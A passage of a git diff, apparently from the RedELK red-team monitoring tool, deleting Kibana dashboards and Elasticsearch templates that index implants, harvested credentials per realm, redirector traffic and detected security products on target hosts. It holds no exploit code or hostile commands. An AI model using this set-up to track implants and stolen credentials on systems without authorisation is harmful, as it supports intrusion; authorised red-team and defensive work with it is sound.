© OpenStreetMap contributors | Elastic Maps Service

", - "id": "road_map", - "maxZoom": 18, - "minZoom": 0, - "subdomains": [], - "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" - }, - "tmsLayers": [ - { - "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", - "id": "road_map", - "maxZoom": 18, - "minZoom": 0, - "subdomains": [], - "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" - } - ] - } - }, - "title": "RedELK - Redirector Traffic All", - "type": "tile_map" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "redirtraffic", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 187 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": false, - "params": { - "query": "implant_newimplant" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "implant_newimplant" - } - } - } - ], - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - } - } - }, - "title": "RedELK - Implant per top users with computers", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Amount of implants" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customLabel": "Username", - "field": "user.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 20 - }, - "schema": "segment", - "type": "terms" - }, - { - "enabled": true, - "id": "3", - "params": { - "customLabel": "Computername", - "field": "host.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": false, - "otherBucketLabel": "Other", - "size": 50 - }, - "schema": "group", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 200 - }, - "position": "left", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false, - "style": { - "color": "#eee" - } - }, - "isVislibVis": true, - "labels": {}, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Amount of implants" - }, - "drawLinesBetweenPoints": true, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-2" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-2", - "labels": { - "filter": true, - "rotate": 75, - "show": true, - "truncate": 100 - }, - "name": "BottomAxis-1", - "position": "bottom", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Amount of implants" - }, - "type": "value" - } - ] - }, - "title": "RedELK - Implant per top users with computers", - "type": "horizontal_bar" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171875895, - 190 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Redirector traffic alarmed IP over time", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": { - "customLabel": "Total hits" - }, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "drop_partials": false, - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1, - "scaleMetricValues": false, - "timeRange": { - "from": "now-30h", - "to": "now" - }, - "useNormalizedEsInterval": true - }, - "schema": "segment", - "type": "date_histogram" - }, - { - "enabled": true, - "id": "3", - "params": { - "customLabel": "Alarmed IPs", - "field": "source.ip", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other IPs", - "size": 10 - }, - "schema": "group", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "filter": true, - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": true, - "style": {}, - "title": {}, - "type": "category" - } - ], - "detailedTooltip": true, - "grid": { - "categoryLines": false - }, - "isVislibVis": true, - "labels": { - "show": false - }, - "legendPosition": "right", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "seriesParams": [ - { - "circlesRadius": 1, - "data": { - "id": "1", - "label": "Total hits" - }, - "drawLinesBetweenPoints": true, - "lineWidth": 2, - "mode": "stacked", - "show": true, - "showCircles": true, - "type": "histogram", - "valueAxis": "ValueAxis-1" - } - ], - "thresholdLine": { - "color": "#E7664C", - "show": false, - "style": "full", - "value": 10, - "width": 1 - }, - "times": [], - "type": "histogram", - "valueAxes": [ - { - "id": "ValueAxis-1", - "labels": { - "filter": false, - "rotate": 0, - "show": true, - "truncate": 100 - }, - "name": "LeftAxis-1", - "position": "left", - "scale": { - "mode": "normal", - "type": "linear" - }, - "show": true, - "style": {}, - "title": { - "text": "Total hits" - }, - "type": "value" - } - ] - }, - "title": "RedELK - Redirector traffic alarmed IP over time", - "type": "histogram" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 192 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - MITRE ATT&CK Tactics tag cloud", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "signal.rule.threat.tactic.name", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 300 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "maxFontSize": 64, - "minFontSize": 18, - "orientation": "single", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "scale": "linear", - "showLabel": false - }, - "title": "RedELK - MITRE ATT&CK Tactics tag cloud", - "type": "tagcloud" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 194 - ], - "type": "visualization", - "version": "1" - }, - { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "savedSearchRefName": "search_0", - "title": "RedELK - Credentials per realm tag cloud", - "uiStateJSON": "{}", - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "creds.realm.keyword", - "missingBucket": false, - "missingBucketLabel": "Missing", - "order": "desc", - "orderBy": "1", - "otherBucket": true, - "otherBucketLabel": "Other", - "size": 100 - }, - "schema": "segment", - "type": "terms" - } - ], - "params": { - "maxFontSize": 72, - "minFontSize": 18, - "orientation": "single", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "scale": "linear", - "showLabel": false - }, - "title": "RedELK - Credentials per realm tag cloud", - "type": "tagcloud" - } - }, - "coreMigrationVersion": "7.16.3", - "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", - "migrationVersion": { - "visualization": "7.14.0" - }, - "references": [ - { - "id": "3fabe620-6c38-11ea-97d6-55783aed877a", - "name": "search_0", - "type": "search" - } - ], - "sort": [ - 1642171875895, - 196 - ], - "type": "visualization", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_ilm.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_ilm.json deleted file mode 100644 index c11edf8f..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_ilm.json +++ /dev/null @@ -1 +0,0 @@ -{"policy":{"phases":{"hot":{"min_age":"0ms","actions":{"rollover":{"max_size":"100gb","max_age":"365d"},"set_priority":{"priority":1}}}}}} diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_bluecheck.json deleted file mode 100644 index 9ff9b079..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_bluecheck.json +++ /dev/null @@ -1,154 +0,0 @@ -{ - "aliases": {}, - "index_patterns": [ - "bluecheck" - ], - "mappings": { - "_meta": {}, - "_source": {}, - "properties": { - "bluecheck": { - "properties": { - "accountname": { - "type": "text" - }, - "accountstate": { - "type": "text" - }, - "certissuer": { - "type": "text" - }, - "certsubject": { - "type": "text" - }, - "message": { - "type": "text" - }, - "pwchangedate": { - "type": "date" - }, - "sectools": { - "properties": { - "ProcessID": { - "type": "text" - }, - "Product": { - "type": "text" - }, - "Vendor": { - "type": "text" - } - }, - "type": "nested" - }, - "sectoolsamount": { - "type": "integer" - }, - "uri": { - "type": "text" - } - }, - "type": "object" - }, - "bluechecktimestamp": { - "type": "text" - }, - "bluechecktype": { - "type": "text" - }, - "classifier": { - "type": "keyword" - }, - "domain": { - "type": "keyword" - }, - "host": { - "properties": { - "domain_ext": { - "type": "text" - }, - "ip": { - "type": "ip" - }, - "ip_ext": { - "type": "ip" - }, - "ip_int": { - "type": "ip" - }, - "name": { - "type": "text" - }, - "os": { - "dynamic": true, - "enabled": true, - "properties": { - "family": { - "type": "text" - }, - "full": { - "type": "text" - }, - "kernel": { - "type": "text" - }, - "name": { - "type": "text" - }, - "platform": { - "type": "text" - }, - "version": { - "type": "text" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "infra": { - "properties": { - "attack_scenario": { - "type": "keyword" - } - }, - "type": "object" - }, - "message": { - "type": "text" - }, - "path": { - "type": "keyword" - }, - "pstools": { - "properties": { - "psx": { - "properties": { - "edr_name": { - "type": "text" - }, - "security_product": { - "type": "text" - } - }, - "type": "object" - }, - "tool": { - "type": "text" - } - }, - "type": "object" - }, - "results": { - "type": "text" - }, - "type": { - "type": "keyword" - } - } - }, - "order": 0, - "settings": {}, - "version": 3 -} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_credentials.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_credentials.json deleted file mode 100644 index f9e197a3..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_credentials.json +++ /dev/null @@ -1,354 +0,0 @@ -{ - "aliases": {}, - "index_patterns": [ - "credentials" - ], - "mappings": { - "_meta": { - "beat": "rtops", - "version": "7.8.0" - }, - "_routing": { - "required": false - }, - "_source": { - "enabled": true, - "excludes": [], - "includes": [] - }, - "date_detection": false, - "dynamic": true, - "dynamic_templates": [ - { - "labels": { - "mapping": { - "type": "flattened" - }, - "path_match": "alarm.alarm_*" - } - } - ], - "numeric_detection": false, - "properties": { - "@timestamp": { - "type": "date" - }, - "agent": { - "properties": { - "ephemeral_id": { - "ignore_above": 1024, - "type": "keyword" - }, - "hostname": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "c2": { - "properties": { - "log": { - "properties": { - "type": { - "type": "keyword" - } - }, - "type": "object" - }, - "program": { - "type": "keyword" - } - }, - "type": "object" - }, - "creds": { - "properties": { - "credential": { - "type": "keyword" - }, - "host": { - "type": "keyword" - }, - "realm": { - "type": "keyword" - }, - "source": { - "type": "keyword" - }, - "username": { - "type": "keyword" - } - }, - "type": "object" - }, - "ecs": { - "properties": { - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "event": { - "properties": { - "action": { - "ignore_above": 1024, - "type": "keyword" - }, - "category": { - "ignore_above": 1024, - "type": "keyword" - }, - "code": { - "ignore_above": 1024, - "type": "keyword" - }, - "created": { - "type": "date" - }, - "dataset": { - "ignore_above": 1024, - "type": "keyword" - }, - "duration": { - "type": "long" - }, - "end": { - "type": "date" - }, - "enriched_from": { - "type": "keyword" - }, - "hash": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "ingested": { - "type": "date" - }, - "kind": { - "ignore_above": 1024, - "type": "keyword" - }, - "module": { - "ignore_above": 1024, - "type": "keyword" - }, - "original": { - "ignore_above": 1024, - "type": "keyword" - }, - "outcome": { - "ignore_above": 1024, - "type": "keyword" - }, - "provider": { - "ignore_above": 1024, - "type": "keyword" - }, - "reference": { - "ignore_above": 1024, - "type": "keyword" - }, - "risk_score": { - "type": "float" - }, - "risk_score_norm": { - "type": "float" - }, - "sequence": { - "type": "long" - }, - "severity": { - "type": "long" - }, - "start": { - "type": "date" - }, - "timezone": { - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "url": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "infra": { - "properties": { - "attack_scenario": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "log_type": { - "type": "keyword" - } - }, - "type": "object" - }, - "input": { - "properties": { - "type": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "log": { - "properties": { - "file": { - "properties": { - "path": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "flags": { - "ignore_above": 1024, - "type": "keyword" - }, - "level": { - "ignore_above": 1024, - "type": "keyword" - }, - "logger": { - "ignore_above": 1024, - "type": "keyword" - }, - "offset": { - "type": "long" - }, - "origin": { - "properties": { - "file": { - "properties": { - "line": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "function": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "original": { - "ignore_above": 1024, - "type": "keyword" - }, - "source": { - "properties": { - "address": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "syslog": { - "properties": { - "facility": { - "properties": { - "code": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "priority": { - "type": "long" - }, - "severity": { - "properties": { - "code": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "message": { - "norms": false, - "type": "text" - }, - "tags": { - "ignore_above": 1024, - "type": "keyword" - } - } - }, - "order": 1, - "settings": { - "index": { - "mapping": { - "total_fields": { - "limit": "10000" - } - }, - "number_of_replicas": "0", - "number_of_shards": "1", - "query": { - "default_field": "*" - }, - "refresh_interval": "5s" - } - }, - "version": 1 -} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_email.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_email.json deleted file mode 100644 index d4165f8f..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_email.json +++ /dev/null @@ -1,827 +0,0 @@ -{ - "aliases": {}, - "index_patterns": [ - "email-*" - ], - "mappings": { - "_meta": {}, - "_source": {}, - "properties": { - "@timestamp": { - "type": "date" - }, - "@version": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "arc-authentication-results": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "arc-message-signature": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "arc-seal": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "authentication-results": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "content-language": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "content-transfer-encoding": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "content-type": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "date": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "dkim-signature": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "emailfolder": { - "doc_values": true, - "eager_global_ordinals": false, - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "feedback-id": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "from": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "in-reply-to": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "infra": { - "properties": { - "attack_scenario": { - "type": "keyword" - }, - "log_type": { - "type": "keyword" - } - }, - "type": "object" - }, - "message": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "message-id": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "mime-version": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "received": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "received-spf": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "references": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "return-path": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "subject": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "thread-index": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "to": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-account-notification-type": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-eopattributedmessage": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-eoptenantattributedmessage": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-forefront-antispam-report-untrusted": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-gm-message-state": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-google-dkim-signature": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-google-smtp-source": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-incomingheadercount": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-incomingtopheadermarker": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-message-delivery": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-message-info": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-microsoft-antispam": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-microsoft-antispam-mailbox-delivery": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-microsoft-antispam-message-info": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-microsoft-antispam-message-info-original": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-microsoft-antispam-prvs": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-microsoft-antispam-untrusted": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-antispam-messagedata": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-antispam-messagedata-original": { - "type": "text" - }, - "x-ms-exchange-authentication-results": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-crosstenant-authas": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-crosstenant-authsource": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-crosstenant-fromentityheader": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-crosstenant-id": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-crosstenant-network-message-id": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-crosstenant-originalarrivaltime": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-crosstenant-originalattributedtenantconnectingip": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-crosstenant-rms-persistedconsumerorg": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-eopdirect": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-minimumurldomainage": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-authas": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-authsource": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-expirationinterval": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-expirationintervalreason": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-expirationstarttime": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-expirationstarttimereason": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-messagedirectionality": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-network-message-id": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-pcl": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-recordreviewcfmtype": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-organization-scl": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-processed-by-bccfoldering": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-senderadcheck": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-transport-crosstenantheaderspromoted": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-transport-crosstenantheadersstamped": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-transport-crosstenantheadersstripped": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-exchange-transport-endtoendlatency": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-has-attach": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-office365-filtering-correlation-id": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-office365-filtering-correlation-id-prvs": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-oob-tlc-oobclassifiers": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-publictraffictype": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-tnef-correlator": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-traffictypediagnostic": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-ms-userlastlogontime": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-msametadata": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-msapipeline": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-notifications": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-originatororg": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-received": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-sender-ip": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-sid-pra": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - }, - "x-sid-result": { - "fields": { - "keyword": { - "ignore_above": 256, - "type": "keyword" - } - }, - "type": "text" - } - } - }, - "order": 1, - "settings": { - "index": { - "mapping": { - "total_fields": { - "limit": "10000" - } - }, - "number_of_replicas": "0", - "number_of_shards": "1", - "query": { - "default_field": "*" - }, - "refresh_interval": "5s" - } - }, - "version": 1 -} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_implantsdb.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_implantsdb.json deleted file mode 100644 index 968ecc9b..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_implantsdb.json +++ /dev/null @@ -1,904 +0,0 @@ -{ - "aliases": {}, - "index_patterns": [ - "implantsdb" - ], - "mappings": { - "_meta": { - "beat": "rtops", - "version": "7.8.0" - }, - "_routing": { - "required": false - }, - "_source": { - "enabled": true, - "excludes": [], - "includes": [] - }, - "date_detection": false, - "dynamic": true, - "dynamic_templates": [ - { - "labels": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "labels.*" - } - }, - { - 